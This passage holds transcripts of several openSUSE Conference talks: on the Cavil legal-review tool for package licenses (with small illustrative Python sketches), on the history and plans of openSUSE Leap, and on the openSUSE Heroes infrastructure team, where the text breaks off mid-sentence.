remaining time.
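To make the bot's part a little more concrete, here is a minimal sketch of the decision it has to make: accept automatically if the package and its detected license combination are already known to be good, otherwise wait for a lawyer. This is only an illustration, not the real legal-auto code, which talks to OBS and to the review application; the package names, the SPDX expressions and the KNOWN_GOOD table are made up.

# Minimal sketch of the auto-accept decision legal-auto makes (hypothetical data,
# not the real bot, which talks to OBS and to the external review application).

# Combinations a lawyer has already approved, keyed by package name and the
# SPDX-style license expression detected in its sources.
KNOWN_GOOD = {
    ("nasm", "BSD-2-Clause"),
    ("perl-Foo", "Artistic-1.0 OR GPL-1.0+"),   # "+" means "or any later version"
}

def review(package: str, detected_expression: str) -> str:
    """Auto-accept known combinations, otherwise leave the request for a lawyer."""
    if (package, detected_expression) in KNOWN_GOOD:
        return "accepted automatically"
    return "waiting for manual legal review"

if __name__ == "__main__":
    print(review("nasm", "BSD-2-Clause"))                 # accepted automatically
    print(review("nasm", "BSD-2-Clause AND GPL-2.0"))     # waiting for manual legal review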
So we called it Cavil, after a long brainstorming session about what to name it, because it had a very boring name before, and the reason I wanted a good name is that we want to open source this application. We are not there yet, but we are in the process of polishing it so we can actually show it to someone. This application is fed with review requests by the bot, and possibly by developers directly. It checks out the sources from the Build Service, unpacks them recursively, and then runs multi-pattern matching on the sources, which means it knows how a GPL-2.0 is marked in the source, how a GPL-3.0 is marked, how a BSD is marked, and it does this pattern matching quite quickly. It then presents the lawyer a summary of which licenses were found in which files and what the combination looks like. The licenses within this tool have a risk associated with them, so they are grouped from more important to less important, and each license has a series of patterns associated with it; the reason why we need several I will explain soon enough. All the patterns are checked in parallel on the sources, and the longest match wins. If the README says "it's licensed under the GPL", we have a license that is called GPL-unspecified, which needs more research. If the text says "licensed under the GPL version 2", then we name this GPL-2.0, which means only version 2; but if it says "licensed under the GPL version 2 or later", then we add a plus to the license, because then we can mix it with GPL-3. The patterns allow a magic keyword called "skip", which allows ignoring a number of words within the license text. So this is how the legal queue looks in Cavil. It has the link to the Build Service request to be reviewed, when it was created, the package name and a summary of the license report, as we call it, basically the combination. One of these reports, for NASM, would look like this. There are several licenses that you can see, but the most prominent is the purple part; the low-risk keywords and "all rights reserved" are just noise in some sense. The purple part is BSD-2-Clause, and that's also what the spec file says, so the review would be rather quick, but there is one GPL-2.0 file in there, and the reviewer has to check how this file is actually used. If it is only a test case, then this is okay, because it's not shipped as part of the binary. If it's content, that is also a different story. But if it's part of the sources, then the overall license changes, so this has to be reviewed by someone who is really experienced with all this mixing of licenses. Fortunately we even have more than one such person. So the main story is: why is this taking so long? Some people complain that the legal review takes too long or very long, and as I try to explain, the situation is quite complex: for every file in the source code we have to identify the license that this very file is under, then we have to find the combination of sources that creates certain binaries, and then determine from there the legal consequences that has.
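As a rough illustration of what such a per-file scan and summary boil down to, here is a toy sketch. It is nothing like the real Cavil implementation, which unpacks sources recursively and matches thousands of patterns very quickly; the patterns, risk values and file contents below are invented, but the two ideas from above are there: the longest matching pattern wins, and the result is grouped by license for the report.

# Toy sketch of how a per-file scan can be summarized into a report like the
# NASM one above. Patterns, risks and file contents are made up; the real Cavil
# unpacks the sources recursively and matches many patterns at once.
from collections import defaultdict

PATTERNS = [
    # (license, risk, marker text) - the longest matching marker wins per file
    ("GPL-2.0",         3, "under the terms of the gnu general public license version 2"),
    ("GPL-unspecified", 4, "under the terms of the gnu general public license"),
    ("BSD-2-Clause",    1, "redistribution and use in source and binary forms"),
]

def scan(files: dict) -> dict:
    """Assign each file the license of its longest matching pattern."""
    report = defaultdict(list)
    for name, text in files.items():
        text = " ".join(text.lower().split())
        hits = [(len(marker), lic) for lic, _risk, marker in PATTERNS if marker in text]
        if hits:
            report[max(hits)[1]].append(name)
    return report

files = {
    "asm.c":  "Redistribution and use in source and binary forms ...",
    "test.c": "... under the terms of the GNU General Public License version 2 ...",
}
for license_name, hit_files in scan(files).items():
    print(license_name, "->", hit_files)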
So very often part of the review is finding out how the build process works, which libraries are used in which binary, and whether certain files or patches are applied or not, and so this takes a long time for packages more complex than what I showed you. There is no one working full time on that, and no human soul should work full time on this, because, and trust me, I tried it, if you do this too often in a row you end up really grumpy and reject more than you should, because it is just very annoying to see all these upstream projects doing so many stupid things with licenses. And one consequence of these stupid things upstream projects do is that we have to create new patterns for the same license over and over again. The GPL, each version of it, has a very specific instruction for what you should do if you want to release your source code under the GPL: you just have to copy and paste some boilerplate into each of your sources. It should be formalized, it should really be straightforward pattern matching; unfortunately there are literally thousands of variants of how people write this markup in their code. The skip keyword already reduces the number of variants we need, but it is still insane what people do. And this comes from real people actually adding extra clauses to the licenses or to the sources, people adding random grammar changes they felt were necessary, people doing a global search and replace on their sources and unfortunately hitting a license with it, people adding random typos while opening the editor or while trying to quit vim, I don't know. So, for example, this is a pretty standard BSD 3-clause license: it has three clauses, and at the end it says that otherwise there are no warranties and in no event shall the copyright owner be liable, and blah blah blah, the typical licensing stuff you click away when you install software. And then you have this, which is basically the same conditions, and I bet you did not even spot the difference, but I'll blink it for you: it's just "its contributors" versus "their contributors". So it is the same thing in English, but for a machine trying to pattern match it's really, sorry, this is on video. And this is another example of the same thing, where people felt like removing stuff or adding stuff to pretty standard license text. So for this BSD 3-clause alone we have, I think, one thousand five hundred different patterns that all look very much the same but are random variations of this. And as I said, when you do this too often, it annoys you, and at some point you want to say to the packager, who is innocent: get your upstream project fixed or I will not review this.
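To show why such a skip keyword helps against these near-identical variants: a pattern can allow a bounded number of arbitrary words at a marked position, so "its contributors" and "their contributors" collapse into one pattern instead of two. The sketch below is only an illustration of that idea with an invented $SKIP syntax; it is not Cavil's actual pattern format.

# Simplified sketch of the "skip" idea: $SKIP1 tolerates up to one arbitrary word,
# so the "its contributors" / "their contributors" variants match a single pattern.
# This is an illustration of the concept, not Cavil's real pattern syntax.
import re

def pattern_to_regex(pattern: str) -> re.Pattern:
    parts = []
    for word in pattern.split():
        if word.startswith("$SKIP"):
            # allow up to N arbitrary words at this position
            parts.append(r"(?:\S+\s+){0,%d}" % int(word[5:]))
        else:
            parts.append(re.escape(word) + r"\s+")
    regex = "".join(parts)
    if regex.endswith(r"\s+"):
        regex = regex[: -len(r"\s+")]
    return re.compile(regex, re.IGNORECASE)

PATTERN = pattern_to_regex(
    "in no event shall the copyright owner or $SKIP1 contributors be liable"
)

for variant in (
    "IN NO EVENT SHALL THE COPYRIGHT OWNER OR ITS CONTRIBUTORS BE LIABLE",
    "IN NO EVENT SHALL THE COPYRIGHT OWNER OR THEIR CONTRIBUTORS BE LIABLE",
):
    print(bool(PATTERN.search(variant)), "for:", variant)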
So there are some future plans for this application. The most prominent is that we want to open source it and release it on GitHub; the actual underlying algorithm is already on GitHub. We need to have the packages associated with a product or project, so we can actually see the status of Factory and whether every package has been reviewed; another reason we need this association is so we can clean up stuff that is no longer relevant. And currently updates are reviewed basically as new packages, so we need some kind of diff view. These are the short-term plans. For the longer term I am considering investing in machine learning, because the process of defining new patterns is quite boring, and as you can see the patterns are very similar, so deriving one from the other sounds technically possible to teach to a machine. The next thing is that I would like the bot to become smarter about what it can approve on its own instead of waiting for someone, because a package looks very, very similar to another package; for example, there are classes of Perl packages and classes of Haskell packages that are basically the same thing. So, if we subtract Antonio's time and my technical problems, we have five minutes left, so if there is one question I could answer it; otherwise I would leave you for lunch. Hi, I was once in a nice packaging workshop with my colleague darix, and there I found out that the mosquitto package we packaged is distributed under a license which is called the Eclipse Public License, I think. I filed a bug about it, and the answer was: look into the license, it's a standard 3-clause BSD license. But the thing is, it's published on the Eclipse website as a copy of the BSD clauses under a new name, and it's also dual-licensed under the Eclipse Distribution License, which is findable in the SPDX format. So what do I do in such a case, use the other license, or? So naming a license is very common: if I write Cavil and release it under the GPL, you will find several projects that then call this license the "Cavil license" in their documentation, so they can change the license later without changing the application. I guess this is one of those cases, but case by case we have to review whether this license actually adds or removes rights compared to the other license, and this is actually what SPDX does. If I remember the case correctly, SPDX even had a discussion about whether this is a new license or just a different name for the same license. So it's case by case, and they only add the new name to the SPDX list if it is not just a copy, only if it adds or removes rights, or if it's really, really, really popular already. The SPDX discussions are public. Alright, what will you do if there's a license update to an existing package? Like if the files change but the packager doesn't bother updating the License field? Good question, and I have it prepared, but I guess it's invisible because of my X render problems.
So this is the latest XRDP update to Factory, and it is held up in legal review, which is really stupid, because the licenses did not really change, but to the machinery it is a new combination. The reason is, and this is just to give you another example, that the spec file already says Apache and GPL; you can see Apache, I'm not sure you can see what I can see, you can see Apache and GPL, and further below you can see LGPL and MIT, which don't map to the overall result, and there are several other licenses that come from random build tools. So what happened in the XRDP update: it is just a patch-level update, but they updated the build system to the latest autoconf macros, and the FSF puts their license in every file. So what this brings in now is no longer GPL-2.0 with autoconf exception but GPL-3.0 with autoconf exception. This is a new combination to the tool, and it waits for the lawyer to approve that the update is fine. That's what I mean when I say we need a diff view quickly, because it's very hard to find the needle in this. What we see is that the package no longer has the same combination of licenses it used to have, so we hold it for review, and this unfortunately queues behind all the other updates. Yeah, I'll make it short. You said to trust the legal review process so we don't have to go through the licenses ourselves. You've indicated that users should trust the legal review process instead of reading the licenses; is that just cross-your-fingers trust, or are there any additional guarantees that the legal review is actually going to be correct? So, if you have legal training, you sure should read the LibreOffice license yourself, but for everyone else the chance of finding the problems in that LibreOffice license text yourself is much, much smaller than just crossing your fingers. So trust me, if I say trust the review process, I mean: this whole process is still not perfect, and as you can see there's so much noise that it's not so hard to actually miss something, and since, to my knowledge, no upstream project is using such a process, we are very likely the first to actually find issues. But the good news is that most open source developers have good intentions when they publish their code, so even if they don't use a proper license and just upload it to GitHub, for them it's already open source, and these good intentions are something the legal review has to take into account as well. So thank you. Thank you for your patience.
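Coming back to the diff view wished for in the XRDP example: in essence it only needs to compare the license combination detected in the old revision with the one detected in the new revision, so the reviewer sees what appeared and what went away instead of re-reading the whole report. Here is a minimal sketch with made-up license sets that mirror the XRDP case; this is not something Cavil does today.

# Minimal sketch of a "diff view" between two scan results: show only the
# licenses that appeared or disappeared between package revisions.
# The license sets below are made up to mirror the XRDP example above.
old_scan = {"Apache-2.0", "GPL-2.0+", "LGPL-2.1", "MIT", "GPL-2.0-with-autoconf-exception"}
new_scan = {"Apache-2.0", "GPL-2.0+", "LGPL-2.1", "MIT", "GPL-3.0-with-autoconf-exception"}

added = sorted(new_scan - old_scan)
removed = sorted(old_scan - new_scan)

print("new in this update:", added)      # ['GPL-3.0-with-autoconf-exception']
print("gone in this update:", removed)   # ['GPL-2.0-with-autoconf-exception']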
The legal review happening in the Factory development process is a black box for many, even though it is very important for keeping openSUSE away from danger. But many only know the downside of this requirement: when the review takes "too long". This presentation tries to shed light on that black box and show the processes and applications used, explaining the challenges and pitfalls - and the actions we took to speed up the process.
10.5446/54456 (DOI)
Hi, everyone awake? You had enough time to sleep in Richard's talk, so I hope you pay attention now. So, welcome. I'm Ludwig, the release manager of openSUSE Leap, and my topic today is openSUSE Leap: recap, state and outlook. I will tell you some facts and the history, then we look at the current state of Leap 42 and the download numbers, and then we take a look into the future, at what's coming up this year. Let's start with the recap. Richard already showed this slide, I think. openSUSE up to 13.2 was a branch of our development head branch, which back then was called Factory. We did a fork basically every 8 to 12 months, stabilized it for a while, and then released it as a new distribution. That had the advantage that it was new every year, but at the same time it had the disadvantage that it was old every year. So it was always a compromise between new and old. Another disadvantage was that it was mostly disconnected from SLES. SLES was developed independently of openSUSE, so we had some overlap, but not much. That's a problem when it comes to maintenance: even though we had 18 months of maintenance, we only got a limited amount of fixes, because SLE engineers mostly work on different versions of the packages. Also, the rise of Tumbleweed and Evergreen during that time showed that there was a need for a different model. Evergreen was an approach to extend the maintenance of the old openSUSE releases beyond the 18 months, and Tumbleweed, as Richard showed before, was an approach to get some packages rolling on top of the stable release. So around the time of 13.2 we started to work on the new Tumbleweed, as Richard explained before, which made Tumbleweed a distribution of its own. We no longer have this development head branch that is untested, that only contains the latest and greatest but is not integrated; we converted it into a separate distribution, and that left room for something else, a more stable version, and that is Leap. The idea behind Leap is to take SLES as the basis. SLES in turn is also based on Factory, but stabilized by SUSE engineers and better integrated. So the idea is to take that, put packages from Tumbleweed on top, add more desktops, for example, and then we also get new versions every year, but based on SLES. We get easier upgrades, because the base system is already tested on the SLES side. We also get 18 months of maintenance for every release; 18 months because that is a six-month overlap after the next release, and in total we get more than three years of maintenance for a major version line. The first one of this kind was 42.1, released in November 2015, and as planned it took the base system from SLE, and mostly only that from SLE, because SLES 12 is actually between 13.1 and 13.2. So from an openSUSE perspective, 42.1 based on SLE 12 was a slight step backwards, which can also be seen in the RPM macros, where SLE 12 is 1315, in between 13.1 and 13.2. It was hard to judge which packages to take from openSUSE and which ones to take from SLE to avoid going backwards too much. So 42.1 didn't take the SLE kernel, but a newer one. It also took GNOME in a newer version, because the one from SLE was perceived as being too old compared to what you got in 13.2. And in the middle of the development process, SP1 was released for SLE 12, so the 42.1 development had to be rebased onto the SP1 packages. Overall, I always considered 42.1 to be somewhat of an experiment.
We didn't know where to go: move more towards the openSUSE side or lean more towards SLE, share more packages or take more recent ones. Overall I think it worked out for 42.1. One of the major pain points, I think, was KDE back then. It wasn't really the best version we had, and this was the default desktop, so kind of embarrassing. That also led to my rant last year at this conference: we had to release a maintenance update that was a version update for KDE during maintenance, and that is not nice to have for a stable release. Another struggle we had during the development of 42.1 was that SLE hadn't adopted the Factory development process yet. What Richard explained in the talk before, with stagings and openQA, was not adopted by SLE yet, because it was too new. But Leap already had it. So we saw quite some fallout that was not detected by SLE. On the other hand, it also showed the SLES guys that what we're doing there in Tumbleweed is quite cool and that they should adopt it for SLES. So for 42.2 in 2016, SLE had already adopted the Factory development process more, which made it easier to get the packages from there. But the first obstacle in development was actually KDE again, because that major version update in maintenance caused quite some integration issues in the beginning. That kept me busy for quite a while, until SP2 was published. And SP2 was huge: we had a new kernel, a new systemd, a new GNOME, a new Qt, and all of that had to be integrated. Overall more than a thousand packages, I think; it was all but trivial to get Leap into that state. During the development of SP2, SUSE noticed that it's a good idea to take packages from Factory, because most of the work was already done there. For example, GNOME in 42.1 was slightly newer than in SLE 12, so they moved to a newer version and SP2 was easier for them. But for that they had to take the packages from Factory, which had conflicting changelog entries compared to the ones in SLE. It was quite a challenge to figure out the right way to do that. In the end, SLE release management agreed to accept Factory changelogs without merging old entries into them or somehow mangling the changelogs. I think that was a big step towards common sources, and thanks for that; it was a great compromise from the SLE side. The only condition we have to fulfill is that we don't lose bug numbers or CVE entries in changelogs. So every once in a while you see packages going into Factory that only have a changelog change adding bug numbers. If you're a community packager, please accept them; they help us keep SLE and Factory in sync. So that's from the time of 42.2. What we also got with 42.2 was the Leaper bot. It's a bot that helps mostly release management to see which packages come from where. It comments on new requests and complains loudly if they are not from Factory, for example. The release of 42.2 had to be delayed for Plasma. We made a compromise with the KDE team after the conference that we would integrate the Plasma 5.8 long-term release into Leap. For that we had to delay our release, and they would move their release date earlier. So with that we managed to get a long-term supported Plasma as the default desktop again. It was a big risk, because we really didn't know what the quality of that thing would be; the schedule was very tight. And from the outside it looked like it was released upstream, then we put it in the distribution, and the next day we had it there, working and fully tested. But that was not what happened.
It was a lot of work behind the scenes, weeks and months before. Our KDE team created the live CDs, Argon and Krypton, and they were already tested in openQA. So a quite big chunk of the integration work and bug fixing was already done via those live CDs. Also, Dominique was so kind to accept KDE release candidates into the stagings. Normally, in Factory we only accept the latest stable release from upstream, and as long as KDE is in beta or RC phase it is not a candidate for Factory. But he let us put it into a staging already, so we could get the same packages that are candidates for Factory into Leap and accept them in Leap. So a later Leap beta already had the pre-releases of Plasma, and on the release day of Plasma 5.8 it was quite easy to do the minor jump to the final version. So big thanks to the KDE team again for doing that, and thanks to upstream for making a Plasma long-term service release. And I had no complaints about the default desktop of 42.2, as far as I know. So, great work from everybody. Now everyone is interested in how 42.2 did. I'll put up the graph here, and while you are staring at it I'll drink a bit. So what do we see here? These are the download statistics of download.opensuse.org. Zypper sends a UUID with every request, so we know, even with changing IP addresses, which system downloads packages. And by looking at all the repos that are published on download.opensuse.org, we can relate each repo to a distribution. So this is not just the official update repo, this is all OBS repos; even packages built for, say, 13.2 in someone's home project would be reflected here. On the Y axis we see the number of UUIDs, that is, the number of active users we have per month; once a UUID shows up in a given month, it is counted there. On the X axis we see the time, back to 2012. So what else can we see? There are spikes; those are the releases. The release days, where is my mouse? Here is 13.1, this is the release day of 13.2, here is 42.1 and here 42.2. Pretty obviously, 13.2 was big in terms of release day impact. I don't know what exactly we did on that release day, but there was a huge spike in the number of users during the release period, and it also gained quite some users and a stable user base over time. Another thing that is visible is that Tumbleweed really took off. After 13.2 we gained more and more users in Tumbleweed; it's a huge success compared to before, when it was barely visible at all. Now for the not so pleasant things: the spike for 42.1 was quite low. So either we did the wrong marketing or people were not interested, but for sure it didn't have the huge impact that 13.2 had. What we can also see is that we got more Tumbleweed users around the release day of 42.1; so whatever we do in the press, it brings new users to all distributions. And we see that for 42.2 the release day impact was even smaller. Overall, 42.1 didn't really cut into the user base of the previous release. I guess most openSUSE users were cautious, didn't want to jump onto this new release immediately and stayed with 13.2. And even today about one third of our users are still on 13.2, even though it ran out of maintenance in January. And that is the other strange thing in this graph: in January we suddenly see a drop of users on 13.2.
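The counting behind this graph is conceptually simple: for every month, count how many distinct UUIDs showed up in the logs of a given repo. A rough sketch of that aggregation follows; the log format here is invented for illustration, the real statistics are of course generated from the download.opensuse.org server logs.

# Rough sketch of the "active users per month" counting: one distinct UUID seen
# in a month counts as one active installation. Log format here is hypothetical.
from collections import defaultdict

log_lines = [
    # (date, uuid, repo) - in reality parsed from download.opensuse.org logs
    ("2017-03-02", "aaaa-1111", "update/42.2"),
    ("2017-03-17", "aaaa-1111", "update/42.2"),   # same machine again, counted once
    ("2017-03-20", "bbbb-2222", "tumbleweed"),
    ("2017-04-01", "aaaa-1111", "update/42.2"),
]

users_per_month = defaultdict(set)
for date, uuid, repo in log_lines:
    month = date[:7]                      # "YYYY-MM"
    users_per_month[(month, repo)].add(uuid)

for (month, repo), uuids in sorted(users_per_month.items()):
    print(month, repo, "->", len(uuids), "active installations")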
The explanation might be that we didn't actually lose them, we just can't count them anymore: as soon as 13.2 went out of maintenance, the repo wasn't refreshed anymore, so the repomd data doesn't change, and zypper then likely only does HEAD requests to check whether the repo is current, but no GET requests anymore. So we don't see any requests anymore, and all the users that previously refreshed the update repo are gone from this graph. That is, I guess, why we have this drop on the right side. Another thing to take into account is IPv6. This graph only counts IPv4, but when looking at the IPv6 statistics from Google we can see that over the last one and a half or two years the adoption rate of IPv6 increased and many users moved to IPv6. So part of the reason why this graph is low on the right side might be that users went to IPv6. Again, this is hopeful, wishful thinking and trying to be positive. Nevertheless, the user base of Leap and Tumbleweed together is not as big as I would have hoped for. As a consequence of the still high number of 13.2 users, I have now enabled the 13.2 upgrade test in the Leap testing for 42.3 as well. We should also make sure that upgrades from 13.2 to 42.3 are smooth, to accommodate those who stayed on 13.2. The same goes for 42.1; we still pay attention to the 42.1 release. I think many users also stayed with 42.1 waiting for 42.3, just to avoid doing an upgrade for one release and then another upgrade shortly afterwards. So far for the numbers. Let's take a look at the current state. What we are currently working on is 42.3. We are aiming for the end of July 2017 as the release date. It is based on SLE 12 SP3, which fortunately is not as big as SP2 was; it is mostly a refresh and hardware enablement release. That means no new GNOME, no new KDE (well, not because of SLE but because we don't do it), no new systemd, no new Qt, everything mostly stays on the same version. Nevertheless, it's something like 400 packages from SLE alone, plus the stuff that comes from Factory. What we can also see in 42.3 is that SLE release management takes the Factory-first policy really seriously. Packages that go to SLE, and the version upgrades there, first go to Factory and then to SLE, or at least at the same time. That really helps us develop 42.3 in parallel to SP3 and benefit from mutual bug reports, for example; even bugs that come in on the Leap side can be addressed on the SLE side. What also happened is that the Leaper bot we introduced in 42.2 is now used on the SLE side internally, so SLE release management also knows when packages diverge from Factory, for example. Some roadblocks for the development are NDAs. That is mostly an internal thing to solve: some feature requests are under a non-disclosure agreement, so they cannot be made public before a certain date. But since we want to develop in parallel to SLE, we lack some packages that we would like to have and test. Also new in the 42.3 development is the rolling release process. We took the tools from Tumbleweed, and instead of doing manual snapshots every four weeks or every two weeks or whatever, with fixed deadlines like "you need to submit all your packages on Friday to get them into the snapshot on Wednesday", we now do a rolling model: packages are checked in any time when the staging is green, and snapshots are released automatically by openQA when everything is green.
That is pretty nice for me as a release manager, because I can call it a day on Friday and I don't have to work on Sunday, and for our packagers it's the same. But it is also a problem for marketing, because we have no milestones anymore, so there's no big news in the press. We have to find a solution for that to raise awareness. So far I haven't seen too many 42.3 bugs. I don't think we are bug-free, so I think it's just not tested enough. Meanwhile, we have also reached the beta phase. That is also not that visible due to the rolling model, but SLE is mostly done with its beta phase, so the base system is quite stable, and so we can also call it a beta. So if you are on 42.2, for example, and just slightly adventurous, go to 42.3; it's stable enough. These slides run on 42.3, my workstation runs on 42.3, so whenever there's a problem, I share the pain. What else? It's x86_64 only. We do have the Ports subproject for AArch64 and POWER, but so far I didn't see much activity, and for AArch64 openQA is red, so I don't know if anyone takes care of it. Officially we only have x86_64. What's new? We got more than 1,000 packages more than in the previous release, so we are at 10,100 now; Tumbleweed is at 11,000. Why do I know that we are above 10,000? I noticed because 10,000 is the quota in OBS: I did a check-in, went home, and then suddenly OBS didn't build any packages anymore because I had gone over the quota, so I had to go and ask to please lift the quota and let us build more than 10,000 packages in 42.3. New is also the desktop selection. In 42.2 I tried to get rid of Enlightenment, and Simon complained loudly, so we needed a different solution for the desktop selection dialog, and now we have it. It's based on the SLES role selection. It's not as fancy as the old desktop selection, but it does the job, and it allows us to treat, let's say, second-tier desktop environments all the same. So instead of having Xfce there for whatever reason and Enlightenment there for whatever reason, we now have the primary selection, GNOME and KDE, and all the other ones behind the role selection's custom item. We also got the Python singlespec macros in, meanwhile, so finally we can put Python modules from Factory into 42.3 again. And all the other new features can be seen on this wiki page, but it's empty, so there is nothing more for me to report here. That leads me directly to the contribution section for 42.3. Please, please, please fill in this features page, because marketing has nothing to talk about. If you put any new package into Leap, and there are more than 1,000 of them, there must be something new in there; please mention it in the wiki page. That's where marketing is looking. Also, if you implemented some great new things in existing packages, please add them there. Of course, please test it. We promised smooth updates from previous releases, and that doesn't happen automatically; we need people to test that. We especially need testing on physical hardware. We have openQA testing, in KVM, but we really need tests on real hardware. Then translations are also a topic to contribute to. All of it is in Weblate meanwhile, even the desktop files. It's really easy for beginners: just log in on the website, pick your project and start translating. And the custom software selection dialog needs to be fixed; it still doesn't work as expected for some desktop environments. Also, we need desktop environments to actually ship patterns to be visible there.
So if you're a maintainer of some second-tier desktop environment, please create a proper pattern and test that it works in the installation process. Then we have software.opensuse.org. That is also still waiting for contributors. It's a Ruby on Rails application. We got a proposal from Richard more than a year ago; it's in there in some branch, a redesign of the website, but we need to get it live. So we're looking for Ruby on Rails developers to make that happen. If you are one and are interested, please approach us so we can set it up. And for our users there are the release notes. So if you know of any incompatible changes or noteworthy glitches, for example, please file a pull request against the release notes. Last but not least, please do beta pizza parties. Even though we don't do beta announcements, they are quite useful for local communities to get together and try the new release, and maybe get new users. From now on all snapshots are beta quality, so just pick any one and do your party. So far the current state. Now let's look beyond 42. The next major version is 15. The version number is decided and the OBS project is created; feel free to rant about it, but it won't change anymore. What's going to happen? SLE is going to fork from Factory again quite soon; they have their beta in September already. We are aiming for a release in March 2018. So there's not much time left to do major changes in Factory. If you have any disruptive changes, please do them now, do them yesterday. It's about time, September is very close. Of course the new SLES will have everything new. Stefan Behlert has a talk after mine and he will go into more detail about what he can say is coming. But for sure we will have a new kernel and, you know, a new systemd, new everything. And we will have Wayland by default. A question mark for me is behind KDE. What do we do with KDE, will they have an LTS release again for us? I would like to stay with KDE as the default desktop; please, KDE, do your part to make that happen. What I would also like to see in 15 is easier migration. The current way to do migrations in Leap is to modify your repos and do a zypper dup. That's okay for techies, but SLE has a better mechanism: it has a YaST module, so it's really easy to jump from one service pack to the next. It would be really nice to have that in Leap as well. That would require SCC registration, though, so that is something that might be controversial: we're doing a community distribution, do we really want to have registration and registration keys? I don't know, maybe we can find a solution. But for sure it would be good to share the code with SLE, so not to invent a separate upgrade method but to use the YaST module that we have in SLE. Regarding packages, I would like to do an opt-out model for the 42 packages. That means 15 should include all packages that we had in 42, and maintainers who no longer think a package can be maintained for the next three or four years should then file delete requests. All the new packages coming from Tumbleweed will be opt-in, just like now. So we may do rounds of automatic submissions, but all package maintainers have the option to decline the reviews that get opened. So that's already my part of this talk. Any questions from the audience? Could someone please bring the microphone? I see on openQA that there is a test for 42.3 JeOS. Is that actually going to be a product? Yes and no. I think there is no one working full time on that.
We would like to see that happen, but it currently lacks workforce. It shouldn't be too hard to get it running; it might be a job for volunteers to just look at it, fix one or two things and get it going. It shouldn't really be hard. But it's not an official deliverable. If it is green at the time of the release, I'm more than happy to offer it as an official part of the release. No more questions? Everyone happy with Leap? No version discussions? Should we release on Friday the 13th? I noticed that 42.3 is also based on SLE, so it's the 4.4 kernel. That's great if you run it on a server or on a bit older hardware, but what about people who want to run it on the latest hardware, let's say the latest network cards or Wi-Fi cards or something like that? So yeah, it's the 4.4 kernel, and it's not made for the latest and greatest hardware. But fortunately we share the kernel with SLES, and SLE is not just the server but also SLED, the desktop, and SUSE does backport drivers to that kernel. I also saw a separate kernel module package for graphics drivers, for example. So there is some hardware enablement in this kernel. I mean, we cannot guarantee everything, but there is hardware enablement. And if in doubt, of course, you can also use 42.3 with a new kernel from Tumbleweed if you need to. Good. If there are no more questions, one more thing: we are hiring. So if you want to work for SUSE, or close to me, go to suse.com. We have a flyer. So thanks for your attention.
Two 42 versions were released (42.1 and 42.2), and one is in the works (42.3). Time to recap what we achieved so far, discuss the progress of 42.3 and maybe take a look at what 15 will bring us.
10.5446/54458 (DOI)
We are the Heroes. I'm Theo, next to me is my colleague, and together we will give the presentation about the Heroes infrastructure. We will talk about the machines, the people, the services and how you can help. [Several sentences here are unintelligible in the recording.] We have two locations. One of them is in Provo; that one is on the SUSE side. We have a couple of physical machines and many, many virtual machines: for OBS, for openQA, for Jenkins, for KVM hosts, and many terabytes of storage. It does not matter too much exactly how many virtual machines there are today, because the number keeps changing. Now that we have seen the machines, we can look at the people who run them. These are the Heroes at the workshop that took place in Nuremberg in December, right before Christmas. [Parts of this are unintelligible.] Of course there is also SUSE IT and the Micro Focus IT team, which are responsible for some of the services, and beyond that, people contribute as volunteers. So I will now introduce some of the people, but this list is far from complete; there are many more who do work for us. We have Christian and Sarah, both from the community, who take care of the wiki. Lars does everything. Torsten is this person here. We have Markus, we have Per from the community, who takes care of the mailing lists, and we have darix, also from the community. Max, from the community, helps with some of the political topics, so that we can find out who to ask, because Max knows the history.
We have Nils, who helps with part of the infrastructure, and Adrian and Henne, who also help with it. Richard is here; Dominique handles openQA and many other things, and on top of that he keeps finding new things to do on his own, so you don't need to give him tasks. Wolfgang(?) helps with openQA, as do Stephan Kulow and others. Christian does a bit of everything. Martin, from the Prague office, does monitoring and now also helps with other things. Stanislav works on Weblate, Daniel does Jenkins, Ancor helps us whenever we need him, and Rudi, from the forums and now also Weblate, does a lot. Michael from Provo is on the Micro Focus side, and Michal, who makes Weblate, does a lot as well. [A stretch of the recording is unintelligible here.] So, we have seen the machines and the people; now let's look at the services and the tools we use to run them. First, I will give you a short overview of the tools. The first one is GitLab. For those who don't know what GitLab is: it is a clone of GitHub that you can deploy on your own infrastructure, and it also offers its own CI application, which is quite good. In GitLab we now have many repositories, and most importantly we have the salt repository. About the salt repo I will say a bit more, because we started with salt about a year ago; before that we used a different configuration management system. Salt is the key piece for me: if something in the Heroes infrastructure is not in the salt repo, it is not official. Practically, all new deployments and all new machines we set up are supposed to go into the salt repo, so that they are documented and easy to redeploy the next time we need them. We use Icinga for the monitoring. Right now the monitoring for openSUSE is still run the old way, and a new setup is something I am working on, to rebuild the monitoring from scratch. [The rest of this part of the recording is an unintelligible repetition.]
[A long stretch of this recording consists of unintelligible repetitions.] For the day-to-day work, we track our tickets on progress.opensuse.org, and for the most important services we use the new status page on opensuse.org, which shows the state of the most critical services.
These are the services that the Heroes run, and there are also services that the community runs on its own. Whatever is community-run is managed by the community, and that will not change soon; I am not even sure it should change. The nice thing about this split is that we can draw a clear line and say what is community and what is not. Among the things the community runs are, for example, the backup servers. [Parts of this are unintelligible.] There are also services that are still in the process of being migrated, either from SUSE or from Micro Focus IT, to the community side. One big item is a single, important machine that still hosts several services; when we get a new machine, we have to check every service and coordinate with our team and with the service owners to move the data and the services over. There is also some tradition involved; it is not a technical problem, it is more a political one, so let's just say it is in progress. [Another stretch of the recording is unintelligible.] Our team itself also changed: we were renamed, and we now have representation towards SUSE, which I believe made us more visible. And with that, more new people from the community are joining our meetings and will help going forward.
What came out of that is that people took it seriously and started to understand what is difficult and what needs to be done to move things forward. It was hard, but now we have many new people from the community and many new people from SUSE who volunteer and help with the infrastructure in their spare time. After the last openSUSE Conference, a group of us met in Nuremberg for three very productive days; there is more about that on the news and on SUSE's web pages. And of course we have had other meetings since then as well. Another thing is the packaging situation I mentioned before. The packages that we need and that were not in the distribution used to live in SUSE's internal OBS instance. That has changed: we now have an official project on the public OBS, where you can see the packages we run, and from the packages you can understand what our services are built with. The project is only for the extra packages we need to run the infrastructure. A very important milestone is that we finally took over DNS, after several years. DNS, as a service, was not run by SUSE, it was run by Micro Focus IT, so whenever we needed a new record, the process could take quite a while, and for us that was painful. DNS was handed over to us in February, and since then we have done a big cleanup of the DNS data, especially in the internal domain. Of course the responsibility is now shared differently between us, SUSE and Micro Focus IT, but it was very important for us to get this, and on top of it we now have monitoring, so we can see what the state of the DNS actually is. Another important change is that we now have regular meetings. There is a meeting at the beginning of every month, at 6:00 UTC, which is 7:00 Central European winter time, and everyone is welcome to join us. The agenda is collected beforehand in a ticket on progress.opensuse.org, so you can add your own topics and join the meetings if you want. The meetings work quite well, I can say. The only thing is that many of the 